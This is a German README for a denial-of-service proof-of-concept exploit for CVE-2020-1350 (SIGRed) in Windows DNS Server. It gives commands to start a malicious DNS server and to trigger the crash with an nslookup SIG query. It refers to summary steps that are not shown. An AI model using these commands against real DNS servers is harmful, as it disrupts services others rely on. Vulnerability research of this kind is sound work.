
Ein Denial-of-Service-Proof-of-Concept für CVE-2020-1350
Die Credits für den Bug gehen vollständig an Check Point Research (@_cpresearch_), die eine unglaubliche Beschreibung dieses Bugs verfasst haben (Props an @sagitz_ für den Beitrag) Ihre Beschreibung ist hier zu finden.
Dieser Exploit wurde von @maxpl0it geschrieben
Kurze Zusammenfassung der Funktionsweise:
Zum Beispiel habe ich python sigred_dos.py ibrokethe.net ausgeführt, um den bösartigen DNS-Server zu starten
Wenn Sie Zugriff auf den Windows-Server haben, können Sie einen bedingten Weiterleitungsdienst konfigurieren, der ibrokethe.net auf die IP-Adresse des Hosts verweist, der das Skript ausführt. Dies überspringt effektiv die Schritte 3 und 4 in der Zusammenfassung.
Um die Schwachstelle auf dem Windows-DNS-Server auszulösen, führen Sie nslookup -type=sig 9.your_domain_name_here dns_server_to_target aus
Die Subdomain '9' ist hier tatsächlich erforderlich. Sie müssen dafür keine Domain-Einträge ändern, da das Skript sich darum kümmert.
Als Beispiel: Ich habe nslookup -type=sig 9.ibrokethe.net 127.0.0.1 ausgeführt, während ich dies auf dem Server ausgeführt habe.